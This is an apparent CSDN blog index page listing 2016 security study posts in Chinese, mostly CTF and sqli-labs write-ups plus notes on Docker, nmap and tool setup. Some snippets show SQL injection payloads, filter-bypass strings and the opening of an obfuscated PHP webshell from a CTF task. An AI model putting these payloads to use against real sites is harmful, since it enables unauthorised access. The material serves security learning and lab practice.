- 博客(29)
- 资源 (3)
- 收藏
- 关注
原创 php webshell 过狗
今天在做ctf题时,遇到了一个关于web的题目,题目要求是找到webshell的密码,且webshell,可以下载下来!!webshell的代码:<?php $sNFSM8939 = "py)v95c_*gwr/a;4nodtz2i(k6jx831feb7s0muq.hl";$VgiNDZ6054 = $sNFSM8939[0].$sNFSM8939[11].$sNFSM8939[32].$sNF
2016-11-06 19:41:24 108296
原创 DOCKER 详解
docker 三大组建: 镜像 image 容器 container 仓库 repositorydocker利用容器来运行应用,容器是从镜像创建的运行实例仓库分为公开仓库 docker hub,私有仓库Private1.安装docker ubuntu sudoapt−getupdate sudo apt-get update sudo apt-get install -y dock
2016-11-05 20:11:37 604
转载 php create_function()产生的漏洞
create_function(‘参数’,’函数体’):官方example:<?php$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n";echo $newfunc(2, M_E) . "\n";
2016-11-03 16:41:46 3021
原创 实验吧-杯酒人生(凯撒解密,维基利亚密码)
通过凯撒解密可以得到原来的密钥是computer 下面开始进行维基利亚解密: 先看看一张图片: 维基利亚解密: 如果知道密钥的docker,要加密的明文是my is talent 则密钥和明文的对应关系就是: docker dock myista lent开始加密: 图片的第一列就是对应的密钥,第一行是对应的明文,中间对应的是加密后的密文 根据这种关系,m应该加密后的密文是:N ……
2016-11-03 11:01:38 1315
转载 php反序列化
php存在一个很有意思的漏洞,php对象注入,也可以称为php反序列化漏洞 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字反序列化之代码注入: 我们先来看一段存在漏洞的代码。
2016-11-02 22:01:58 294
翻译 vsftpd 配置文件详解
vsftpd配置文件详解1.默认配置: 1>允许匿名用户和本地用户登陆。 anonymous_enable=YES local_enable=YES 2>匿名用户使用的登陆名为ftp或anonymous,口令为空;匿名用户不能离开匿名用户家目录/var/ftp,且只能下载不能上传。 3>本地用户的登录名为本地用户名,口令为此本地用户的口令;本地用户可以在自 己家目录中进
2016-10-31 13:35:44 305
原创 kali 信息收集
侦查(信息收集) kali中的工具information gathering信息收集的方法: 公共信息来源(从公共信息来源上收集信息的一般知识) 1.从目标网站上获取信息:许多网站都会列出他们的管理团队, 公众人物,hr联系人的成员, 2.查看其他信息:合伙人,当前的招聘广告,业务信息,安全策略 等, 3. 网站根目录下的robots.tx
2016-10-24 23:11:54 733
转载 ctf网站集合
本文是转载文章,看到作者写的这篇博文 总结的非常好,害怕以后丢失,所以转载备份。原文作者:4ido10n 原文请点击:原文正文如下:Author:4ido10nHome:http://www.secbox.cn/author/4ido10n学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orz
2016-10-24 20:29:42 3406
原创 渗透测试的概要和环境配置
kali linux 是Backtrack的进化版渗透测试的一般步骤:第一步: 侦探 信息收集,目标环境和系统特征的有关信息,服务器开放的端口,提供给客户的服务类型,对信息进行社会工程,记录发现的内容第二布:目标测试 对目标进行漏洞测试,测试出目标的薄弱环节,找出易受攻击的系统,并确定其优先级,将易受攻击系统和资产所有者进行隐射第三步:漏洞利用 拿到权限,抓去非授权的数据,积极的进行社会工程,
2016-10-24 19:18:16 477
转载 文件上上传漏洞
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿势
2016-10-22 19:54:43 487
原创 ubuntu 安装搜狗输入法
1. 在搜狗输入法官网上下载linux版本的搜狗输入法2. 安装fcitx,sudo apt-get install fcitx3. 在system setting --------language Support 中设置 keyborad input method sysetem 为fcitx4. 开始安装搜狗输入法 sudo dpkg -i xxxx.deb5. sudo apt-
2016-10-19 11:34:43 228
原创 nmap 常用语法简介
nmap xx.xx.x.x Host is up (0.0012s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 3306/tcp open mysql 8009/tcp open a
2016-10-18 13:42:47 2927
转载 python 设置代理
1.关于代理简单的说,代理就是换个身份。网络中的身份之一就是IP。比如,我们身在墙内,想要访问google、u2b、fb等,直接访问是404,所以要换个不会被墙的IP,比如国外的IP等。这个就是简单的代理。在爬虫中,有些网站可能为了防止爬虫或者DDOS等,会记录每个IP的访问次数,比如,有些网站允许一个IP在1s(或者别的)只能访问10次等,那么我们就需要访问一次换一个IP(具体什么策略,自己决定)
2016-10-16 15:22:17 2711
原创 sqli labs 6
1. 题目26当id=1时,页面报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 所以我猜测sql语句是:select *
2016-10-16 14:23:12 295
转载 关于mysql注入,替换空格
在今天进行sql注入的测试过程中,在代码中过滤了空格 – # ,等字符串,经过不懈的努力,最终只剩下空格还没有被替换,所以在这,总结一下在mysql中如何替换空格。替换空格:select * from table where id=1E0union selsect 1,2,3select * from table where id=1.0union select 1,2,3select * f
2016-10-16 13:30:18 3572
转载 使用python在linux中输出带颜色的文字
格式代码如下:格式:\033[显示方式;前景色;背景色m说明:前景色 背景色 颜色---------------------------------------30 40 黑色31 41 红色32 42
2016-10-15 01:26:02 525
原创 sqli labs 5
1. 题目:23 Get-error-based-script comments输入代码 id=1',报错:'1'' LIMIT 0,1根据错误可以尝试构造sql语句: select * from table where id='1' limit 0,1所以注入的语句可以是:1' or 1=1 --+(#),但是这两种注释都报错,猜测可能是过滤了字符串 -- # , 再次构造注入语句是: 1'
2016-10-15 01:19:00 280
原创 sqli labs 4
1. 题目19:题目19中的注入是header 头注入,要想注入的前提是知道用户名,密码$row1 = mysql_fetch_array($result1); if($row1) { echo '<font color= "#FFFF00" font size = 3 >'; $insert="INSERT
2016-10-13 12:15:34 250
原创 linux 安装jdk tomcat
1. 安装jdk 在官网下载jdk http://download.oracle.com/otn-pub/java/jdk/8u101-b13/jdk-8u101-linux-x64.tar.gz?AuthParam=1476323161_bd7322a9991fc2bdea032a369db443e9 解压 tar -zxvf ……tar.gz 添加环境配置 sudo vim
2016-10-13 10:21:24 198
转载 忘记mysql root密码
mysql root 密码忘记了??关闭mysql服务器找到mysql的配置文件在配置文件中添加 [mysqld]下添加一行skip-grant-tables重启mysql 服务器msyql -u root -p 不用输入密码 直接登录进去修改mysqlroot 密码: update user set password=password=”pass” where user=”root”
2016-10-12 15:18:33 222
转载 tcp/ip 协议 学习笔记1
Transmission Control Protocol/Internet Protocol的简写,中译名为传输控制协议/因特网互联协议,又名网络通讯协议,是Internet最基本的协议、Internet国际互联网络的基础,由网络层的IP协议和传输层的TCP协议组成 tcp/ip 协议不是一个协议,而是一个协议族,包含:TCP,UDP,ICMP,IP,http,ftp,pop3,RIP、TE
2016-10-12 09:26:21 563
原创 sqli labs 3
题目:16 通过尝试,没有爆出sql语法错误的信息,因此尝试各种万能密码: ’ or 1=1 # ” or 1=1 # ‘) or 1=1 # “) or 1=1 # ‘)) or 1=1 # “)) or 1=1 # 进过测试:”) or 1=1 # 是万能密码,登录成功题目17: 初次尝试各种万能密码,没有
2016-10-11 15:49:06 221
原创 sqli labs 2
sqli labs 2 的一些答案解析题11: 查看页面首先这是一道post注入题目的练习 username=admin’ password=1 报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
2016-10-11 11:15:52 226
原创 sql盲注入 python
写一款工具,可以用来进行sql盲注 前提: 数据库是mysql工具中使用的sql语句: 判断表是否存在: (select count(*) from tablename)>0 判断列是否存在:(select count(*) from tablename where 列名=)>0 猜字段中记录长度 ;and (select top 1 len(字段名) from 数据
2016-10-07 19:16:03 482
原创 sqli labs 1
sqli lbas 1 数据库是mysqlsql 查询语句 : sql="SELECT∗FROMusersWHEREid=′sql="SELECT * FROM users WHERE id='id’ LIMIT 0,1”;在index.php?id=,构造可能的sql语句,通过判断是否存在sql注入sql语句 中的注释: – (注意要空格%20 或者是在后面写+) 1.
2016-10-07 19:02:41 324
原创 文章标题
sqli labs 安装 1. 在此之前安装php apache mysql 2. 在github 上下载 3. 解压zip 修改配置文件 sql-connections/db-creds.inc 4. 打开网站进行安装
2016-10-07 15:36:15 172
转载 centos 7 安装mysql5.7
centos7 安装msyql5.7 1. 在mysql官网下载mysql mysql-5.7.10-linux-glibc2.5-x86_64.tar.gz 2. 解压 tar -xvf mysql-5.7.10-linux-glibc2.5-x86_64.tar.gz 3. 添加mysql用户和组,然后安装mysql并启动,初始密码由/root/.mysql_se
2016-10-07 15:00:24 217
原创 欢迎使用CSDN-markdown编辑器
sqlmap 源码分析第一天sqlmap的基本流程 a. 检测环境:checkEnvironment() b. 设置path :setPaths(modulePath()) c. 将命令存储起来以便以后使用cmdLineOptions.update(cmdLineParser().dict) {‘code’: None, ‘getUsers’: None, ‘getPassword
2016-09-29 09:58:44 187
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人